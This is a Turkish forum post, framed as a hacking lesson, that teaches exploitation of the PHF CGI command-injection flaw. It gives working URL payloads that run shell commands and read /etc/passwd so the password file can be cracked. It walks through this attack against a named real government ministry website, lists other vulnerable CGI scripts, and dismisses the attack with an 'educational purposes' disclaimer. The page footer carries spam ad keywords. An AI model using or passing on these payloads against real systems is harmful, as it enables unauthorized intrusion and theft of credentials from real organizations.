Skip to main content

Forumdervis W.

Beta
-

ForumDervis - Genel Forum Sitesi'a hoş geldiniz!

Merhaba, Ziyaretçi! Ben Mini; size yardımcı olabilmek için buradayım. İçerik sağlayıcı paylaşım sitemize eriştiğiniz için çok mutluyuz. Giriş yaparak, birbirinden güzel içeriklerimizden kolaylıkla faydalanabilirsiniz. Kayıtlı değilseniz, hemen ücretsiz ve kolay bir şekilde kayıt olabilirsiniz. Sizi de ailemize bekliyoruz.

(Giriş yapmamış kullanıcılar tarafından görüntülenir.)

Özel mesaj engelinizi kaldırmak için tıklayın ;

Bydemir eğitim 2 hackerlık dersleri

4001
791
0
18-03-2015, Saat: 06:47 PM
#1
Çevrimdışı
~~
     Bu bölümle hacking için passwd dosyalarının alımına başlıyoruz. En önemli kısımlardan biri olan bu bölüm uzun sürecek. İlk olarak PHF tekniğini inceleyeceğiz. Bu teknik çok basit bir yöntemdir. Ama tabiki işe yarar. Ama her sitede değil. Daha çok web site hackingte kullanılyor.
Mantık : phf sistemlerde bulunan bir açıktır ve bu açık sayesinde sisteme web uzerinden bağlanıp shellde bazı komutları çaliştırabilirsiniz... Not : Çalıştırdığınız komutlar cd, ls, cat gibi komutlar silme işlemlerini phf üzerinden yapamıyorsunuz...
 --------------------------------------
 Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan  passwd dosyasini alabilir ve     kirabilirsiniz... Bu olay web uzerinden olur ve hizli olur
 --------------------------------------
 Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki
 satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
 /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
 Bu satirin mantigi sudur...
 Asagidaki satir phf olayini acar...
 /cgi-bin/phf?Qalias=x%0a
 Bu satirdan sonra yazacaginiz komutlar sistem uzerinde calistirilir...
 ornegin :
 cat%20/etc/passwd         etc dizinin altindaki passwd dosyasini  goruntuler burda %20 bosluk oldugunu
 belirtir yani :
 /cgi-bin/phf?Qalias=x%0als     yazarsaniz bulundugunuz dizindeki dosyalar goruntulenir...
 /cgi-bin/phf?Qalias=x%0als%20pass*  yazarsaniz bulundugunuz dizinde
 pass ile baslayan butun dosyalari listeler... Komutun Kullanimi Kolay! Simdi Biraz Ornek Cozelim!
 --------------------------------------
 Evet bu örnek kesinlikle öğretim amaçli çözulmusdur herhangi bir art niyetim yok
 Hedef : T.C. Saglik Bakanlığı
Gerekli Bilgiler : Sadece web sayfalarinin adresi : www.saglik.gov.tr
 Browser'inizi çalıştırın...Adres olarak www.saglik.gov.tr yazin. Evet sayfa geldi simdi bakalim phf acigi
 var mı ?
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0als       yazın!
 tamam dosya listesi karsımıza geldigine göre phf olayı işliyor... Simdi passwd dosyasini alalım...           cat /etc/passwd komutu ile... bu nu phf ile asagidaki gibi yaziliyor...
 http://www.saglik.gov.tr/cgi-bin/phf?Qal...etc/passwd
 tamam Ok dir password dosyasini gordunuz!
 bunu simdi cut/copy/paste ile bir dosyaya saklayın...
 
 
CGI-BIN 'de güvenlik Açıkları (Düzenleyen Projman)
a- (Phf scripti): Pek çok web ana bilgisaıarı CGI-BIN güvenliğinden yoksundur. Bir de bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'ın kullandığı cgi-bin güvenlik açığı:
Fakat bazı uyanık sistem yöneticileri phf komutunun kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz. Fakat yine de alternatif web makinaları üzerinde denemekte yarar var.
b- (Wrap Scripti): Irix i?letim sisteminin 6.2 versiyonunda rastlanan bu hatayy da şöyle istismar edebiliriz:
Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !!
c- (View Source Scripti): Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama ihtimali de var)
d- (php.cgi Scripti):
e- Di?er Denenebilir Scriptler:
Dikkat: Tüm Http girişleri ana bilgisayarlarda günlük şeklinde tutulmaktadır. Bu yüzden güvenliği çok yüksek ve sizin başınıza bela açacağınızı düşündüğünüz sitelere bu yöntemle erişmeyi kesinlikle düşünmeyin !!!
Darkness

Hızlı Menü:

Konuyu Okuyanlar: 1 Ziyaretçi
970x91
buca escort cialis fiyat viagra fiyatı

Forumdervis

Türkiyenin en güncel forum sitesi

Task